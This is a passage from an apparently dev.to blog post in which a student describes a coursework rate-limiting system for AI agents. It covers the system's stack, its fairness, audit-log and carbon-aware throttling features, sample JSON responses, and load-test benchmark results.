&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Ethical&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Accountability diffusion&lt;/td&gt;
&lt;td&gt;"The algorithm did it" as excuse&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Current solutions? &lt;strong&gt;Generic HTTP 429 errors&lt;/strong&gt; with zero context, zero fairness, and zero human control.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 &lt;strong&gt;Key Insight:&lt;/strong&gt; I traced one overnight spike to an autonomous agent retrying a failing call &lt;strong&gt;11,000 times&lt;/strong&gt;. The legacy stack said nothing but &lt;code&gt;429&lt;/code&gt;. That failure pattern shaped IRL's contrastive feedback model.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjrvlib9qjtufpr7482jq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjrvlib9qjtufpr7482jq.png" alt="Figure 4 – Google Trends Related Topics" width="800" height="325"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Figure 4: Google Trends Related Topics and Queries – showing the explosion of interest in AI agents and related technologies.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqr2rl37golsikaihskbc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqr2rl37golsikaihskbc.png" alt="Figure 5 – HCD Gaps in Agentic AI" width="800" height="746"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Figure 5: HCD Gaps in Agentic AI – These complications set the stage for the immediate undermining effects where technical success collided with social and ethical fragility.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why It Matters:&lt;/strong&gt; This assessment defined the problem space—the gap between what developers need (context, fairness, control) and what they get (a wall).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/lfariabr/masters-swe-ai/blob/master/2025-T2/T2-HCD/assignments/Assessment2/HCD402_Faria_L_Assessment_2.pdf" rel="noopener noreferrer"&gt;📄 READ FULL REPORT&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;h3&gt;
  
  
  &lt;strong&gt;Assessment 3: Building the Solution&lt;/strong&gt; &lt;em&gt;(System Design + Presentation)&lt;/em&gt;
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Outcome:&lt;/strong&gt; IRL System Design &amp;amp; Implementation&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;The natural progression: &lt;strong&gt;Design and build a human-centered governance system&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Working with teammates &lt;strong&gt;Julio&lt;/strong&gt; and &lt;strong&gt;Tamara&lt;/strong&gt;, we created the &lt;strong&gt;Intelligent Multi-Tier Rate-Limiting System&lt;/strong&gt;—a 3500-word technical specification, a 12-minute presentation, and most importantly, a &lt;strong&gt;production-ready implementation&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The Challenge:&lt;/strong&gt; Design a complete system solution addressing the problem from A2, with technical architecture, HCD principles, and implementation plan.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why It Matters:&lt;/strong&gt; This wasn't just a paper exercise. We shipped code. We ran benchmarks. We validated the five HCD pillars against real scenarios.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnwwasnh6rzrhx2lmui96.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnwwasnh6rzrhx2lmui96.png" alt="Figure 6 – Early Sketching" width="800" height="533"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Figure 6: Early sketching of the proposed Intelligent Rate Limiting System – from whiteboard to architecture.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/lfariabr/masters-swe-ai/blob/master/2025-T2/T2-HCD/assignments/Assessment3/Faria_Luis_Assessment3_SystemSolution.pdf" rel="noopener noreferrer"&gt;📘 SYSTEM DESIGN REPORT&lt;/a&gt;&lt;/strong&gt; | &lt;strong&gt;&lt;a href="https://github.com/lfariabr/masters-swe-ai/blob/master/2025-T2/T2-HCD/assignments/Assessment3/Faria_Luis_Assessment3_Presentation.pdf" rel="noopener noreferrer"&gt;📊 PRESENTATION&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Project Timeline &amp;amp; Results
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Month&lt;/th&gt;
&lt;th&gt;Assessment&lt;/th&gt;
&lt;th&gt;Status&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;October 2025&lt;/td&gt;
&lt;td&gt;AI Recommendation Systems&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;86% (HD)&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;November 2025&lt;/td&gt;
&lt;td&gt;Agentic AI Problem Report&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;84% (D)&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;December 2025&lt;/td&gt;
&lt;td&gt;IRL System Design&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;72.5% (C)&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Total Duration:&lt;/strong&gt; 12 weeks of intensive human-centered design for AI governance&lt;/p&gt;




&lt;h2&gt;
  
  
  Technical Architecture
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Layer&lt;/th&gt;
&lt;th&gt;Technology&lt;/th&gt;
&lt;th&gt;Purpose&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Runtime&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Node.js + TypeScript&lt;/td&gt;
&lt;td&gt;Async-first for concurrent agents&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;API&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;GraphQL + Apollo Server&lt;/td&gt;
&lt;td&gt;Flexible queries, real-time subscriptions&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;State&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Redis&lt;/td&gt;
&lt;td&gt;Distributed token buckets, sub-ms latency&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Carbon Data&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Green Software Foundation SDK&lt;/td&gt;
&lt;td&gt;Real-time grid intensity&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Deployment&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Docker + Kubernetes&lt;/td&gt;
&lt;td&gt;Horizontal scaling across regions&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Version Control&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Git + GitHub&lt;/td&gt;
&lt;td&gt;Full project history&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Why This Stack?&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;Academic projects offer a unique advantage: &lt;strong&gt;you can optimize for learning AND production-readiness simultaneously&lt;/strong&gt;.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Redis:&lt;/strong&gt; Atomic operations prevent race conditions (powers Twitter, GitHub, StackOverflow)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GraphQL:&lt;/strong&gt; Single endpoint, real-time subscriptions for dashboard updates&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;TypeScript:&lt;/strong&gt; Type safety prevents production bugs in complex async workflows&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Kubernetes:&lt;/strong&gt; Auto-scaling handles traffic spikes without manual intervention&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I containerized everything because the IRL stack is designed to scale horizontally across nodes—essential for enterprise deployments.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fz9ork5agfd421yn6kted.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fz9ork5agfd421yn6kted.png" alt="Figure 7 – Architecture Overview" width="800" height="449"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Figure 7: Architecture overview of the Intelligent Multi-Tier Rate-Limiting System – showing the middleware layer between agentic workloads and backend APIs.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpjoikotro4nd48eocbfp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpjoikotro4nd48eocbfp.png" alt="Figure 8 – GraphQL Schema" width="800" height="886"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Figure 8: The IRL GraphQL schema acts as a clear contract, providing clients with a complete understanding of the API's capabilities. This schema enables real-time monitoring (subscriptions), user self-service (queries), and oversight workflows (mutations).&lt;/em&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  🗝️ The 5 HCD Pillars (Story + Receipts)
&lt;/h2&gt;

&lt;p&gt;Traditional rate limiters are &lt;em&gt;constraints&lt;/em&gt;. IRL is a &lt;strong&gt;collaborative dialogue&lt;/strong&gt;.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Traditional Rate Limiter&lt;/th&gt;
&lt;th&gt;IRL System&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;❌ HTTP 429 (no context)&lt;/td&gt;
&lt;td&gt;✅ Contrastive explanation with alternatives&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;❌ Flat rate limits&lt;/td&gt;
&lt;td&gt;✅ Weighted Fair Queuing (equity &amp;gt; equality)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;❌ Black box decisions&lt;/td&gt;
&lt;td&gt;✅ Real-time dashboard + audit logs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;❌ Cost-blind&lt;/td&gt;
&lt;td&gt;✅ Carbon-aware + financial projections&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;❌ Developer vs. system&lt;/td&gt;
&lt;td&gt;✅ Collaborative governance&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h3&gt;
  
  
  &lt;strong&gt;1. Visibility&lt;/strong&gt; – See What Your AI Is Doing
&lt;/h3&gt;

&lt;p&gt;Real-time dashboard showing:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Request counts and quota consumption&lt;/li&gt;
&lt;li&gt;Projected costs (financial + carbon)&lt;/li&gt;
&lt;li&gt;When limits will reset&lt;/li&gt;
&lt;li&gt;Historical trends and anomaly detection&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The story:&lt;/strong&gt; This is how we caught the $50k spike while it was still forming. No more black boxes.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq7jgek9cd11c7dvneftv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq7jgek9cd11c7dvneftv.png" alt="Figure 9 – IRL Monitoring Dashboard" width="800" height="798"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Figure 9: The IRL Monitoring Dashboard – real-time visibility into agent quotas, carbon footprint, and cost projections.&lt;/em&gt;&lt;/p&gt;




&lt;h3&gt;
  
  
  &lt;strong&gt;2. Feedback&lt;/strong&gt; – Understand &lt;em&gt;Why&lt;/em&gt; You're Being Throttled
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Traditional rate limiter:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;HTTP 429 Too Many Requests
Retry-After: 3600
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;IRL System:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"status"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"throttled"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"reason"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"Daily energy threshold exceeded"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"context"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"current_usage"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"847 kWh"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"daily_limit"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"850 kWh"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"reset_time"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"25 minutes"&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"alternatives"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="s2"&gt;"Request override (2 escalations remaining)"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="s2"&gt;"Schedule for low-carbon window (4:00 AM)"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="s2"&gt;"Reduce task priority to continue at lower quota"&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;The story:&lt;/strong&gt; This is &lt;strong&gt;contrastive explanation&lt;/strong&gt; (Miller, 2019)—not just "what happened" but "why this happened and what would make it succeed." Think &lt;em&gt;coach&lt;/em&gt;, not &lt;em&gt;wall&lt;/em&gt;.&lt;/p&gt;




&lt;h3&gt;
  
  
  &lt;strong&gt;3. Fairness&lt;/strong&gt; – Equity, Not Just Equality
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;The breakthrough moment:&lt;/strong&gt; Our team asked &lt;em&gt;"Fairness for whom?"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;A flat rate limit is &lt;strong&gt;equal&lt;/strong&gt; but not &lt;strong&gt;equitable&lt;/strong&gt;. It would crush independent researchers while barely affecting well-funded enterprises.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Our solution: Weighted Fair Queuing&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;🎓 &lt;strong&gt;Research/Education/Non-profits:&lt;/strong&gt; Priority tier (3x base allocation)&lt;/li&gt;
&lt;li&gt;🚀 &lt;strong&gt;Startups:&lt;/strong&gt; Moderate allocation (1.5x base)&lt;/li&gt;
&lt;li&gt;🏢 &lt;strong&gt;Enterprises:&lt;/strong&gt; Standard rates (1x base, but higher absolute quotas)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The story:&lt;/strong&gt; Inspired by Hofstede's (2011) cultural dimensions—individualist cultures prefer personalized allocation; collectivist cultures favor community-centered sharing. Organizations can configure fairness models to match cultural expectations.&lt;/p&gt;




&lt;h3&gt;
  
  
  &lt;strong&gt;4. Accountability&lt;/strong&gt; – Immutable Audit Logs
&lt;/h3&gt;

&lt;p&gt;Every throttling decision, override request, and ethical flag writes to an &lt;strong&gt;append-only audit log&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Example audit entry:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"timestamp"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"2025-12-05T18:47:23.091Z"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"event_type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"throttle_decision"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"agent_id"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"agent_gpt4_prod_001"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"decision"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"blocked"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"reason"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"carbon_threshold_exceeded"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"alternative_offered"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"schedule_low_carbon_window"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"audit_hash"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"sha256:a3f2c8d9..."&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;The story:&lt;/strong&gt; Every pilot override and throttle is traceable. No more "the algorithm did it."&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb9tpuikh3i8bc8xnxnlg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb9tpuikh3i8bc8xnxnlg.png" alt="Figure 10 – Ethical Governance Lifecycle" width="800" height="184"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Figure 10: The Ethical Governance Lifecycle – from request evaluation through audit logging and appeal workflows.&lt;/em&gt;&lt;/p&gt;




&lt;h3&gt;
  
  
  &lt;strong&gt;5. Sustainability&lt;/strong&gt; – Carbon-Aware Throttling
&lt;/h3&gt;

&lt;p&gt;Integration with &lt;strong&gt;real-time grid carbon intensity data&lt;/strong&gt; from the Green Software Foundation's Carbon-Aware SDK.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How it works:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;System monitors regional grid carbon intensity every 5 minutes&lt;/li&gt;
&lt;li&gt;When renewable energy drops (e.g., nighttime solar gaps), non-urgent agents are deprioritized&lt;/li&gt;
&lt;li&gt;Urgent tasks (labeled by user) continue without interruption&lt;/li&gt;
&lt;li&gt;System suggests optimal execution windows based on forecasted clean energy&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;The story:&lt;/strong&gt; Pilot showed ~30% carbon drop without hurting SLAs. Research-backed: Wiesner et al. (2023) show temporal workload shifting reduces emissions by &lt;strong&gt;15-30%&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9te6hdgrltmnu19at6s4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9te6hdgrltmnu19at6s4.png" alt="Figure 11 – Carbon Aware SDK Pseudo Code" width="800" height="387"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Figure 11: Pseudo code for Carbon-Aware SDK TypeScript implementation – showing real-time grid intensity checks and workload deferral logic.&lt;/em&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Benchmarks &amp;amp; Impact
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Technical Performance (VALIDATED ✅)
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;✅ VALIDATED:&lt;/strong&gt; Real load testing with k6 v1.4.2 and Apache Bench 2.3 on GitHub Codespaces (Ubuntu 24.04, Node.js v22.21.1). These are actual measured results, not projections.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Test Environment:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Single Express.js instance + Redis (Docker)&lt;/li&gt;
&lt;li&gt;50 virtual users, 10,000 unique agent IDs&lt;/li&gt;
&lt;li&gt;30-second sustained load test&lt;/li&gt;
&lt;li&gt;Tools: k6 (scenario testing) + Apache Bench (stress testing)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Real-World Performance - k6 Multi-Agent Test
&lt;/h4&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;Result&lt;/th&gt;
&lt;th&gt;Details&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Throughput&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;381 req/s&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Sustained average across all endpoints&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Total Requests&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;11,616&lt;/td&gt;
&lt;td&gt;Over 30 seconds&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Concurrent Agents&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;10,000+&lt;/td&gt;
&lt;td&gt;Unique agent IDs tested&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Latency (P50)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;1.83ms&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Sub-2ms median response!&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Latency (P95)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;11.73ms&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;95% faster than 12ms&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Max Latency&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;506.83ms&lt;/td&gt;
&lt;td&gt;Worst-case spike&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Success Rate&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;100%&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Zero errors (perfect!)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Rate Limiting&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;24.13%&lt;/td&gt;
&lt;td&gt;2,804/11,616 throttled (working as designed)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Translation for non-engineers:&lt;/strong&gt; The system handled 381 requests per second for 30 seconds straight with zero crashes and lightning-fast response times (faster than blinking). 24% of requests were intentionally throttled to prevent overload—exactly as designed.&lt;/p&gt;

&lt;h4&gt;
  
  
  Real-World Performance - Apache Bench Stress Test
&lt;/h4&gt;

